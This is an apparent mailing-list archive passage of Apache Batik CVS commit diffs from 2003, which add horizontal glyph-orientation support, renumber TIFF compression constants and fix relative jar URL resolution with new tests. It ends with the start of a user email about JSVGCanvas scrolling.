SVGCSSEngine.WRITING_MODE_INDEX: case SVGCSSEngine.GLYPH_ORIENTATION_VERTICAL_INDEX: + case SVGCSSEngine.GLYPH_ORIENTATION_HORIZONTAL_INDEX: case SVGCSSEngine.LETTER_SPACING_INDEX: case SVGCSSEngine.WORD_SPACING_INDEX: case SVGCSSEngine.KERNING_INDEX: { @@ -1514,6 +1515,31 @@ TextAttribute.ORIENTATION_ANGLE); result.put(GVTAttributedCharacterIterator. TextAttribute.VERTICAL_ORIENTATION_ANGLE, + new Float(val.getFloatValue() * 9 / 5)); + break; + default: + // Cannot happen + throw new InternalError(); + } + + // glyph-orientation-horizontal + + val = CSSUtilities.getComputedStyle + (element, SVGCSSEngine.GLYPH_ORIENTATION_HORIZONTAL_INDEX); + switch (val.getPrimitiveType()) { + case CSSPrimitiveValue.CSS_DEG: + result.put(GVTAttributedCharacterIterator. + TextAttribute.HORIZONTAL_ORIENTATION_ANGLE, + new Float(val.getFloatValue())); + break; + case CSSPrimitiveValue.CSS_RAD: + result.put(GVTAttributedCharacterIterator. + TextAttribute.HORIZONTAL_ORIENTATION_ANGLE, + new Float(val.getFloatValue() * 180 / Math.PI)); + break; + case CSSPrimitiveValue.CSS_GRAD: + result.put(GVTAttributedCharacterIterator. + TextAttribute.HORIZONTAL_ORIENTATION_ANGLE, new Float(val.getFloatValue() * 9 / 5)); break; default: 1.3 +20 -22 xml-batik/sources/org/apache/batik/css/engine/value/svg/GlyphOrientationManager.java Index: GlyphOrientationManager.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/css/engine/value/svg/GlyphOrientationManager.java,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- GlyphOrientationManager.java 31 Jul 2002 16:00:08 -0000 1.2 +++ GlyphOrientationManager.java 8 Feb 2003 13:25:12 -0000 1.3 @@ -45,37 +45,35 @@ */ public Value createValue(LexicalUnit lu, CSSEngine engine) throws DOMException { - switch (lu.getLexicalUnitType()) { - case LexicalUnit.SAC_INHERIT: - return SVGValueConstants.INHERIT_VALUE; + switch (lu.getLexicalUnitType()) { + case LexicalUnit.SAC_INHERIT: + return SVGValueConstants.INHERIT_VALUE; - case LexicalUnit.SAC_DEGREE: + case LexicalUnit.SAC_DEGREE: return new FloatValue(CSSPrimitiveValue.CSS_DEG, lu.getFloatValue()); - case LexicalUnit.SAC_GRADIAN: + case LexicalUnit.SAC_GRADIAN: return new FloatValue(CSSPrimitiveValue.CSS_GRAD, lu.getFloatValue()); - case LexicalUnit.SAC_RADIAN: + case LexicalUnit.SAC_RADIAN: return new FloatValue(CSSPrimitiveValue.CSS_RAD, lu.getFloatValue()); - case LexicalUnit.SAC_INTEGER: - { - float n = lu.getIntegerValue(); - if (n == 0f) - return new FloatValue(CSSPrimitiveValue.CSS_DEG, 0f); - break; - } - case LexicalUnit.SAC_REAL: - { - float n = lu.getFloatValue(); - if (n == 0f) - return new FloatValue(CSSPrimitiveValue.CSS_DEG, 0f); - break; + + // For SVG angle properties unit defaults to 'deg'. + case LexicalUnit.SAC_INTEGER: + { + int n = lu.getIntegerValue(); + return new FloatValue(CSSPrimitiveValue.CSS_DEG, n); + } + case LexicalUnit.SAC_REAL: + { + float n = lu.getFloatValue(); + return new FloatValue(CSSPrimitiveValue.CSS_DEG, n); + } } - } - + throw createInvalidLexicalUnitDOMException(lu.getLexicalUnitType()); } 1.2 +15 -7 xml-batik/sources/org/apache/batik/ext/awt/image/codec/tiff/TIFFEncodeParam.java Index: TIFFEncodeParam.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/ext/awt/image/codec/tiff/TIFFEncodeParam.java,v retrieving revision 1.1 retrieving revision 1.2 diff -u -r1.1 -r1.2 --- TIFFEncodeParam.java 16 May 2001 12:33:33 -0000 1.1 +++ TIFFEncodeParam.java 8 Feb 2003 13:25:12 -0000 1.2 @@ -41,38 +41,46 @@ /** No compression. */ public static final int COMPRESSION_NONE = 1; - /** Byte-oriented run-length encoding "PackBits" compression. */ - public static final int COMPRESSION_PACKBITS = 2; - /** * Modified Huffman Compression (CCITT Group 3 1D facsimile compression). * <p><b>Not currently supported.</b> */ - public static final int COMPRESSION_GROUP3_1D = 3; + public static final int COMPRESSION_GROUP3_1D = 2; /** * CCITT T.4 bilevel compression (CCITT Group 3 2D facsimile compression). * <p><b>Not currently supported.</b> */ - public static final int COMPRESSION_GROUP3_2D = 4; + public static final int COMPRESSION_GROUP3_2D = 3; /** * CCITT T.6 bilevel compression (CCITT Group 4 facsimile compression). * <p><b>Not currently supported.</b> */ - public static final int COMPRESSION_GROUP4 = 5; + public static final int COMPRESSION_GROUP4 = 4; /** * LZW compression. * <p><b>Not supported.</b> */ - public static final int COMPRESSION_LZW = 6; + public static final int COMPRESSION_LZW = 5; + + /** + * Code for original JPEG-in-TIFF compression which has been + * depricated (for many good reasons) in favor of Tech Note 2 + * JPEG compression (compression scheme 7). + * <p><b>Not supported.</b> + */ + public static final int COMPRESSION_JPEG_BROKEN = 6; /** * <a href="ftp://ftp.sgi.com/graphics/tiff/TTN2.draft.txt"> * JPEG-in-TIFF</a> compression. */ public static final int COMPRESSION_JPEG_TTN2 = 7; + + /** Byte-oriented run-length encoding "PackBits" compression. */ + public static final int COMPRESSION_PACKBITS = 32773; /** * <a href="http://info.internet.isi.edu:80/in-notes/rfc/files/rfc1951.txt"> 1.20 +4 -1 xml-batik/sources/org/apache/batik/gvt/text/GVTAttributedCharacterIterator.java Index: GVTAttributedCharacterIterator.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/gvt/text/GVTAttributedCharacterIterator.java,v retrieving revision 1.19 retrieving revision 1.20 diff -u -r1.19 -r1.20 --- GVTAttributedCharacterIterator.java 22 May 2002 21:50:40 -0000 1.19 +++ GVTAttributedCharacterIterator.java 8 Feb 2003 13:25:12 -0000 1.20 @@ -363,6 +363,9 @@ public final static TextAttribute VERTICAL_ORIENTATION_ANGLE = new TextAttribute("VERTICAL_ORIENTATION_ANGLE"); + public final static TextAttribute HORIZONTAL_ORIENTATION_ANGLE = + new TextAttribute("HORIZONTAL_ORIENTATION_ANGLE"); + public final static TextAttribute GVT_FONT_FAMILIES = new TextAttribute("GVT_FONT_FAMILIES"); 1.46 +121 -53 xml-batik/sources/org/apache/batik/gvt/text/GlyphLayout.java Index: GlyphLayout.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/gvt/text/GlyphLayout.java,v retrieving revision 1.45 retrieving revision 1.46 diff -u -r1.45 -r1.46 --- GlyphLayout.java 13 Aug 2002 21:33:16 -0000 1.45 +++ GlyphLayout.java 8 Feb 2003 13:25:12 -0000 1.46 @@ -100,6 +100,18 @@ TEXT_COMPOUND_DELIMITER = GVTAttributedCharacterIterator.TextAttribute.TEXT_COMPOUND_DELIMITER; + public static final AttributedCharacterIterator.Attribute + VERTICAL_ORIENTATION + = GVTAttributedCharacterIterator.TextAttribute.VERTICAL_ORIENTATION; + + public static final + AttributedCharacterIterator.Attribute VERTICAL_ORIENTATION_ANGLE = + GVTAttributedCharacterIterator.TextAttribute.VERTICAL_ORIENTATION_ANGLE; + + public static final + AttributedCharacterIterator.Attribute HORIZONTAL_ORIENTATION_ANGLE = + GVTAttributedCharacterIterator.TextAttribute.HORIZONTAL_ORIENTATION_ANGLE; + private static final AttributedCharacterIterator.Attribute X = GVTAttributedCharacterIterator.TextAttribute.X; @@ -124,6 +136,9 @@ private static final Integer WRITING_MODE_TTB = GVTAttributedCharacterIterator.TextAttribute.WRITING_MODE_TTB; + private static final Integer ORIENTATION_AUTO + = GVTAttributedCharacterIterator.TextAttribute.ORIENTATION_AUTO; + static Set runAtts = new HashSet(); static { @@ -476,11 +491,6 @@ int start = aci.getBeginIndex(); int numGlyphs = getGlyphCount(); - boolean glyphOrientationAuto = isGlyphOrientationAuto(); - int glyphOrientationAngle = 90; - if (!glyphOrientationAuto) { - glyphOrientationAngle = getGlyphOrientationAngle(); - } Point2D.Float [] topPts = new Point2D.Float[2*numGlyphs]; Point2D.Float [] botPts = new Point2D.Float[2*numGlyphs]; @@ -509,14 +519,6 @@ PathIterator pi = gbounds.getPathIterator(null); Point2D.Float firstPt = null; - if (isVertical()) { - if (glyphOrientationAuto) { - if (isLatinChar(ch)) - glyphOrientationAngle = 90; - else - glyphOrientationAngle = 0; - } - } while (!pi.isDone()) { type = pi.currentSegment(pts); @@ -1001,6 +1003,7 @@ float[] gp = gv.getGlyphPositions(0, numGlyphs+1, null); float verticalFirstOffset = 0f; + float horizontalFirstOffset = 0f; boolean glyphOrientationAuto = isGlyphOrientationAuto(); int glyphOrientationAngle = 0; @@ -1034,23 +1037,37 @@ GVTGlyphMetrics gm = gv.getGlyphMetrics(i); if (i==0) { - if (glyphOrientationAuto) { - if (isLatinChar(ch)) { - // it will be rotated 90 - verticalFirstOffset = 0f; + if (isVertical()) { + if (glyphOrientationAuto) { + if (isLatinChar(ch)) { + // it will be rotated 90 + verticalFirstOffset = 0f; + } else { + // it won't be rotated + verticalFirstOffset = + (float)gm.getBounds2D().getHeight(); + } } else { - // it won't be rotated - verticalFirstOffset = (float)gm.getBounds2D().getHeight(); + if (glyphOrientationAngle == 0) { + verticalFirstOffset = + (float)gm.getBounds2D().getHeight(); + } else { + // 90, 180, 270 + verticalFirstOffset = 0f; + } } } else { - if (glyphOrientationAngle == 0) { - verticalFirstOffset = (float)gm.getBounds2D().getHeight(); + if ((glyphOrientationAngle == 270)) { + horizontalFirstOffset = + (float)gm.getBounds2D().getHeight(); } else { - verticalFirstOffset = 0f; + // 0, 90, 180 + horizontalFirstOffset = 0; } } } else { - if (glyphOrientationAuto && (verticalFirstOffset == 0f) + if (glyphOrientationAuto && + (verticalFirstOffset == 0f) && !isLatinChar(ch)) { verticalFirstOffset = (float)gm.getBounds2D().getHeight(); @@ -1061,7 +1078,7 @@ // computed on the basis of baseline-shifts, etc. float ox = 0f; float oy = 0f; - float verticalGlyphRotation = 0f; + float glyphOrientationRotation = 0f; float glyphRotation = 0f; @@ -1071,18 +1088,19 @@ if (isLatinChar(ch)) { // If character is Latin, then rotate by // 90 degrees - verticalGlyphRotation = (float) (Math.PI / 2f); + glyphOrientationRotation = (float) (Math.PI / 2f); } else { - verticalGlyphRotation = 0f; + glyphOrientationRotation = 0f; } } else { - verticalGlyphRotation = (float)Math.toRadians(glyphOrientationAngle); + glyphOrientationRotation = (float)Math.toRadians(glyphOrientationAngle); } if (textPath != null) { // if vertical and on a path, any x's are ignored x = null; } } else { + glyphOrientationRotation = (float)Math.toRadians(glyphOrientationAngle); if (textPath != null) { // if horizontal and on a path, any y's are ignored y = null; @@ -1091,10 +1109,10 @@ // calculate the total rotation for this glyph if (rotation == null || rotation.isNaN()) { - glyphRotation = verticalGlyphRotation; + glyphRotation = glyphOrientationRotation; } else { glyphRotation = (rotation.floatValue() + - verticalGlyphRotation); + glyphOrientationRotation); } if ((x != null) && !x.isNaN()) { @@ -1143,13 +1161,15 @@ if (isLatinChar(ch)) { ox += metrics.getStrikethroughOffset(); } else { - Rectangle2D glyphBounds = gv.getGlyphVisualBounds(i).getBounds2D(); + Rectangle2D glyphBounds + = gv.getGlyphVisualBounds(i).getBounds2D(); ox -= (float)((glyphBounds.getMaxX() - gp[2*i]) - glyphBounds.getWidth()/2); } } else { // center the character if it's not auto orient - Rectangle2D glyphBounds = gv.getGlyphVisualBounds(i).getBounds2D(); + Rectangle2D glyphBounds + = gv.getGlyphVisualBounds(i).getBounds2D(); if (glyphOrientationAngle == 0) { ox -= (float)((glyphBounds.getMaxX() - gp[2*i]) - glyphBounds.getWidth()/2); @@ -1162,11 +1182,19 @@ ox -= metrics.getStrikethroughOffset(); } } + } else { + ox += horizontalFirstOffset; + if (glyphOrientationAngle == 90) { + oy -= gm.getHorizontalAdvance(); + } else if (glyphOrientationAngle == 180) { + oy -= metrics.getAscent(); + } } } // set the new glyph position - gv.setGlyphPosition(i, new Point2D.Float(curr_x_pos+ox,curr_y_pos+oy)); + gv.setGlyphPosition(i, new Point2D.Float + (curr_x_pos+ox,curr_y_pos+oy)); // calculte the position of the next glyph if (!ArabicTextHandler.arabicCharTransparent(ch)) { @@ -1189,12 +1217,28 @@ advanceY = gm.getHorizontalAdvance(); // need to translate so that the spacing // between chars is correct - gv.setGlyphTransform(i, AffineTransform.getTranslateInstance(0, advanceY)); + gv.setGlyphTransform + (i, AffineTransform.getTranslateInstance + (0, advanceY)); } } curr_y_pos += advanceY; } else { - curr_x_pos += gm.getHorizontalAdvance(); + float advanceX = 0; + if (glyphOrientationAngle == 0) { + advanceX = gm.getHorizontalAdvance(); + } else if (glyphOrientationAngle == 180) { + advanceX = gm.getHorizontalAdvance(); + // need to translate so that the spacing + // between chars is correct + gv.setGlyphTransform + (i, AffineTransform.getTranslateInstance + (advanceX, 0)); + } else { + // 90, 270 + advanceX = gm.getVerticalAdvance(); + } + curr_x_pos += advanceX; } } @@ -1598,7 +1642,12 @@ // last glyph, use the glyph metrics GVTGlyphMetrics gm = gv.getGlyphMetrics(i); if (horizontal) { - glyphAdvance = gm.getHorizontalAdvance(); + if ((glyphOrientationAngle == 0) || + (glyphOrientationAngle == 180)) { + glyphAdvance = gm.getHorizontalAdvance(); + } else { // 90 || 270 + glyphAdvance = gm.getVerticalAdvance(); + } } else { if (glyphOrientationAuto) { if (isLatinChar(ch)) { @@ -1658,7 +1707,12 @@ // translate glyph backwards so we rotate about the // center of the glyph if (horizontal) { - glyphPathTransform.translate(glyphWidth / -2f, 0f); + if (glyphOrientationAngle == 270) { + glyphPathTransform.translate(glyphWidth / 2f, 0f); + } else { + // 0 || 90 || 180 + glyphPathTransform.translate(-glyphWidth / 2f, 0f); + } } else { if (glyphOrientationAuto) { if (isLatinChar(ch)) { @@ -1667,10 +1721,11 @@ glyphPathTransform.translate(0f, glyphHeight/2f); } } else { - if (glyphOrientationAngle == 0 ) { - glyphPathTransform.translate(0f, glyphHeight/2f); - } else { // 90 || 180 - glyphPathTransform.translate(0f, -glyphHeight/2f); + if (glyphOrientationAngle == 0) { + glyphPathTransform.translate(0, glyphHeight / 2f); + } else { + // 90 || 180 || 270 + glyphPathTransform.translate(0, -glyphHeight / 2f); } } } @@ -1753,13 +1808,13 @@ * Returns whether or not the vertical glyph orientation value is "auto". */ protected boolean isGlyphOrientationAuto() { - boolean glyphOrientationAuto = true; + if (!isVertical()) return false; aci.first(); - if (aci.getAttribute(GVTAttributedCharacterIterator.TextAttribute.VERTICAL_ORIENTATION) != null) { - glyphOrientationAuto = (aci.getAttribute(GVTAttributedCharacterIterator.TextAttribute.VERTICAL_ORIENTATION) - == GVTAttributedCharacterIterator.TextAttribute.ORIENTATION_AUTO); + Integer vOrient = (Integer)aci.getAttribute(VERTICAL_ORIENTATION); + if (vOrient != null) { + return (vOrient == ORIENTATION_AUTO); } - return glyphOrientationAuto; + return true; } /** @@ -1771,25 +1826,38 @@ int glyphOrientationAngle = 0; aci.first(); - Float angle = (Float)aci.getAttribute(GVTAttributedCharacterIterator. - TextAttribute.VERTICAL_ORIENTATION_ANGLE); + Float angle; + + if (isVertical()) { + angle = (Float)aci.getAttribute(VERTICAL_ORIENTATION_ANGLE); + } else { + angle = (Float)aci.getAttribute(HORIZONTAL_ORIENTATION_ANGLE); + } + if (angle != null) { glyphOrientationAngle = (int)angle.floatValue(); } + // if not one of 0, 90, 180 or 270, round to nearest value - if (glyphOrientationAngle != 0 || glyphOrientationAngle != 90 - || glyphOrientationAngle != 180 || glyphOrientationAngle != 270) { + if ((glyphOrientationAngle != 0) || (glyphOrientationAngle != 90) || + (glyphOrientationAngle != 180) || (glyphOrientationAngle != 270)) { + while (glyphOrientationAngle < 0) { glyphOrientationAngle += 360; } + while (glyphOrientationAngle >= 360) { glyphOrientationAngle -= 360; } - if (glyphOrientationAngle <= 45 || glyphOrientationAngle > 315) { + + if ((glyphOrientationAngle <= 45) || + (glyphOrientationAngle > 315)) { glyphOrientationAngle = 0; - } else if (glyphOrientationAngle > 45 && glyphOrientationAngle <= 135) { + } else if ((glyphOrientationAngle > 45) && + (glyphOrientationAngle <= 135)) { glyphOrientationAngle = 90; - } else if (glyphOrientationAngle > 135 && glyphOrientationAngle <= 225) { + } else if ((glyphOrientationAngle > 135) && + (glyphOrientationAngle <= 225)) { glyphOrientationAngle = 180; } else { glyphOrientationAngle = 270; 1.4 +11 -2 xml-batik/sources/org/apache/batik/util/ParsedURLJarProtocolHandler.java Index: ParsedURLJarProtocolHandler.java =================================================================== RCS file: /home/cvs/xml-batik/sources/org/apache/batik/util/ParsedURLJarProtocolHandler.java,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- ParsedURLJarProtocolHandler.java 20 May 2002 17:18:57 -0000 1.3 +++ ParsedURLJarProtocolHandler.java 8 Feb 2003 13:25:12 -0000 1.4 @@ -13,6 +13,9 @@ import java.io.IOException; import java.util.Iterator; +import java.net.URL; +import java.net.MalformedURLException; + /** * Protocol Handler for the 'jar' protocol. * This appears to have the format: @@ -42,7 +45,13 @@ return parseURL(urlStr); // It's relative so base it off baseURL. - return super.parseURL(baseURL, urlStr); + try { + URL context = new URL(baseURL.toString()); + URL url = new URL(context, urlStr); + return constructParsedURLData(url); + } catch (MalformedURLException mue) { + return super.parseURL(baseURL, urlStr); + } } } 1.90 +2 -1 xml-batik/test-resources/org/apache/batik/test/samplesRendering.xml Index: samplesRendering.xml =================================================================== RCS file: /home/cvs/xml-batik/test-resources/org/apache/batik/test/samplesRendering.xml,v retrieving revision 1.89 retrieving revision 1.90 diff -u -r1.89 -r1.90 --- samplesRendering.xml 10 Dec 2002 16:19:17 -0000 1.89 +++ samplesRendering.xml 8 Feb 2003 13:25:12 -0000 1.90 @@ -298,6 +298,7 @@ <test id="samples/tests/spec/text/verticalTextOnPath.svg" /> <test id="samples/tests/spec/text/textPosition.svg" /> <test id="samples/tests/spec/text/textPosition2.svg" /> + <test id="samples/tests/spec/text/textGlyphOrientationHorizontal.svg"/> </testGroup> <testGroup id="tests.spec.scripting"> 1.6 +56 -2 xml-batik/test-resources/org/apache/batik/util/unitTesting.xml Index: unitTesting.xml =================================================================== RCS file: /home/cvs/xml-batik/test-resources/org/apache/batik/util/unitTesting.xml,v retrieving revision 1.5 retrieving revision 1.6 diff -u -r1.5 -r1.6 --- unitTesting.xml 11 Jul 2002 16:26:20 -0000 1.5 +++ unitTesting.xml 8 Feb 2003 13:25:12 -0000 1.6 @@ -268,7 +268,7 @@ value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> <arg class="java.lang.String" value="../base.svg" /> <arg class="java.lang.String" - value="jar:file:dir/file.jar!/p/a/t/h/../base.svg" /> + value="jar:file:dir/file.jar!/p/a/t/base.svg" /> </test> <test id="ParsedURL.18" class="org.apache.batik.util.ParsedURLTest"> <!-- Test fragment from base jar URL --> @@ -303,6 +303,60 @@ value="jar:file:dir/file.jar!/b/a/t/i/k/new.svg#bar" /> <arg class="java.lang.String" value="jar:file:dir/file.jar!/b/a/t/i/k/new.svg#bar" /> + </test> + <test id="ParsedURL.22" class="org.apache.batik.util.ParsedURLTest"> + <!-- Test absolute path, relative jar --> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> + <arg class="java.lang.String" + value="/b/a/t/i/k/new.svg" /> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/b/a/t/i/k/new.svg" /> + </test> + <test id="ParsedURL.23" class="org.apache.batik.util.ParsedURLTest"> + <!-- Test absolute path, relative jar --> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> + <arg class="java.lang.String" + value="/b/a/t/i/k/new.svg#bar" /> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/b/a/t/i/k/new.svg#bar" /> + </test> + <test id="ParsedURL.24" class="org.apache.batik.util.ParsedURLTest"> + <!-- Test relative path, relative jar --> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> + <arg class="java.lang.String" + value="t/o/new.svg" /> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/p/a/t/h/t/o/new.svg" /> + </test> + <test id="ParsedURL.25" class="org.apache.batik.util.ParsedURLTest"> + <!-- Test relative path, relative jar --> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> + <arg class="java.lang.String" + value="t/o/new.svg#foo" /> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/p/a/t/h/t/o/new.svg#foo" /> + </test> + <test id="ParsedURL.26" class="org.apache.batik.util.ParsedURLTest"> + <!-- Test relative path, relative jar --> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> + <arg class="java.lang.String" + value="../c/h/new.svg" /> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/p/a/t/c/h/new.svg" /> + </test> + <test id="ParsedURL.27" class="org.apache.batik.util.ParsedURLTest"> + <!-- Test relative path, relative jar --> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/p/a/t/h/init.svg" /> + <arg class="java.lang.String" + value="../c/h/new.svg#foo" /> + <arg class="java.lang.String" + value="jar:file:dir/file.jar!/p/a/t/c/h/new.svg#foo" /> </test> <test id="ParsedURLData.1" class="org.apache.batik.util.ParsedURLDataTest"> 1.2 +1 -2 xml-batik/test-resources/org/apache/batik/util/resources/TestMessages.properties Index: TestMessages.properties =================================================================== RCS file: /home/cvs/xml-batik/test-resources/org/apache/batik/util/resources/TestMessages.properties,v retrieving revision 1.1 retrieving revision 1.2 diff -u -r1.1 -r1.2 --- TestMessages.properties 5 Jul 2001 16:54:34 -0000 1.1 +++ TestMessages.properties 8 Feb 2003 13:25:12 -0000 1.2 @@ -42,8 +42,7 @@ # # Entry Keys # -ParsedURLTest.entry.key.error.description = \ -Error Description. +ParsedURLTest.entry.key.error.description = Error Description. Base64Test.entry.key.error.description = \ Error Description. 1.3 +12 -9 xml-batik/test-sources/org/apache/batik/util/Base64Test.java Index: Base64Test.java =================================================================== RCS file: /home/cvs/xml-batik/test-sources/org/apache/batik/util/Base64Test.java,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- Base64Test.java 23 Oct 2001 13:42:30 -0000 1.2 +++ Base64Test.java 8 Feb 2003 13:25:12 -0000 1.3 @@ -115,8 +115,9 @@ report.setErrorCode(ERROR_CANNOT_READ_IN_URL); report.setDescription(new TestReport.Entry[] { new TestReport.Entry - (Messages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), - Messages.formatMessage + (TestMessages.formatMessage + (ENTRY_KEY_ERROR_DESCRIPTION, null), + TestMessages.formatMessage (ERROR_CANNOT_READ_IN_URL, new String[]{in.toString(), trace.toString()})) }); @@ -131,8 +132,9 @@ report.setErrorCode(ERROR_BAD_ACTION_STRING); report.setDescription(new TestReport.Entry[] { new TestReport.Entry - (Messages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), - Messages.formatMessage(ERROR_BAD_ACTION_STRING, + (TestMessages.formatMessage + (ENTRY_KEY_ERROR_DESCRIPTION, null), + TestMessages.formatMessage(ERROR_BAD_ACTION_STRING, new String[]{action})) }); report.setPassed(false); @@ -148,8 +150,9 @@ report.setErrorCode(ERROR_CANNOT_READ_REF_URL); report.setDescription(new TestReport.Entry[] { new TestReport.Entry - (Messages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), - Messages.formatMessage + (TestMessages.formatMessage + (ENTRY_KEY_ERROR_DESCRIPTION, null), + TestMessages.formatMessage (ERROR_CANNOT_READ_REF_URL, new String[]{ref.toString(), trace.toString()})) }); @@ -187,8 +190,8 @@ report.setErrorCode(ERROR_WRONG_RESULT); report.setDescription(new TestReport.Entry[] { new TestReport.Entry - (Messages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), - Messages.formatMessage(ERROR_WRONG_RESULT, + (TestMessages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), + TestMessages.formatMessage(ERROR_WRONG_RESULT, new String[]{""+mismatch})) }); report.setPassed(false); 1.2 +6 -5 xml-batik/test-sources/org/apache/batik/util/ParsedURLDataTest.java Index: ParsedURLDataTest.java =================================================================== RCS file: /home/cvs/xml-batik/test-sources/org/apache/batik/util/ParsedURLDataTest.java,v retrieving revision 1.1 retrieving revision 1.2 diff -u -r1.1 -r1.2 --- ParsedURLDataTest.java 11 Jul 2002 16:26:20 -0000 1.1 +++ ParsedURLDataTest.java 8 Feb 2003 13:25:12 -0000 1.2 @@ -80,8 +80,9 @@ report.setErrorCode(ERROR_CANNOT_PARSE_URL); report.setDescription(new TestReport.Entry[] { new TestReport.Entry - (Messages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), - Messages.formatMessage + (TestMessages.formatMessage + (ENTRY_KEY_ERROR_DESCRIPTION, null), + TestMessages.formatMessage (ERROR_CANNOT_PARSE_URL, new String[]{"null", base, @@ -121,8 +122,8 @@ report.setErrorCode(ERROR_WRONG_RESULT); report.setDescription(new TestReport.Entry[] { new TestReport.Entry - (Messages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), - Messages.formatMessage + (TestMessages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), + TestMessages.formatMessage (ERROR_WRONG_RESULT, new String[]{info, ref })) }); report.setPassed(false); 1.3 +6 -5 xml-batik/test-sources/org/apache/batik/util/ParsedURLTest.java Index: ParsedURLTest.java =================================================================== RCS file: /home/cvs/xml-batik/test-sources/org/apache/batik/util/ParsedURLTest.java,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- ParsedURLTest.java 11 Jul 2002 16:26:20 -0000 1.2 +++ ParsedURLTest.java 8 Feb 2003 13:25:12 -0000 1.3 @@ -95,8 +95,9 @@ report.setErrorCode(ERROR_CANNOT_PARSE_URL); report.setDescription(new TestReport.Entry[] { new TestReport.Entry - (Messages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), - Messages.formatMessage + (TestMessages.formatMessage + (ENTRY_KEY_ERROR_DESCRIPTION, null), + TestMessages.formatMessage (ERROR_CANNOT_PARSE_URL, new String[]{base, (sub == null) ? "null" : sub, @@ -114,8 +115,8 @@ report.setErrorCode(ERROR_WRONG_RESULT); report.setDescription(new TestReport.Entry[] { new TestReport.Entry - (Messages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), - Messages.formatMessage + (TestMessages.formatMessage(ENTRY_KEY_ERROR_DESCRIPTION, null), + TestMessages.formatMessage (ERROR_WRONG_RESULT, new String[]{url.toString(), ref })) }); report.setPassed(false); 1.1 xml-batik/test-sources/org/apache/batik/util/TestMessages.java Index: TestMessages.java =================================================================== /***************************************************************************** * Copyright (C) The Apache Software Foundation. All rights reserved. * * ------------------------------------------------------------------------- * * This software is published under the terms of the Apache Software License * * version 1.1, a copy of which has been included with this distribution in * * the LICENSE file. * *****************************************************************************/ package org.apache.batik.util; import java.util.Locale; import java.util.MissingResourceException; import org.apache.batik.i18n.Localizable; import org.apache.batik.i18n.LocalizableSupport; /** * This class manages the message for the test.svg module. * * @author <a href="mailto:[email protected]">Stephane Hillion</a> * @version $Id: TestMessages.java,v 1.1 2003/02/08 13:25:12 deweese Exp $ */ public class TestMessages { /** * This class does not need to be instantiated. */ protected TestMessages() { } /** * The error messages bundle class name. */ protected final static String RESOURCES = "org.apache.batik.util.resources.TestMessages"; /** * The localizable support for the error messages. */ protected static LocalizableSupport localizableSupport = new LocalizableSupport(RESOURCES); /** * Implements {@link org.apache.batik.i18n.Localizable#setLocale(Locale)}. */ public static void setLocale(Locale l) { localizableSupport.setLocale(l); } /** * Implements {@link org.apache.batik.i18n.Localizable#getLocale()}. */ public static Locale getLocale() { return localizableSupport.getLocale(); } /** * Implements {@link * org.apache.batik.i18n.Localizable#formatMessage(String,Object[])}. */ public static String formatMessage(String key, Object[] args) throws MissingResourceException { return localizableSupport.formatMessage(key, args); } } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Feb 11 15:51:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29421 invoked by uid 500); 11 Feb 2003 15:51:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Post: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 29354 invoked from network); 11 Feb 2003 15:51:07 -0000 From: "Geeta Shukla" <[email protected]> To: <[email protected]> Cc: <[email protected]> Subject: Scrolling for JSVGCanvas Date: Tue, 11 Feb 2003 21:21:27 +0530 Message-ID: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0017_01C2D213.89E51AE0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N ------=_NextPart_000_0017_01C2D213.89E51AE0 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0018_01C2D213.89E51AE0" ------=_NextPart_001_0018_01C2D213.89E51AE0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Hi, I am using Batik 1.1.1 for my project to render SVG files. The problem is that I cannot make use of the inner class/fields of JSVGCanvas for scrolling left/right/top/bottom. I tried looking through the JSVGCanvas.java file and found that the method "installActions()" makes a call to all the required inner classes, puts them in a locally created ActionMap hashtable and returns. This seems to me a bug. Does the 1.5beta 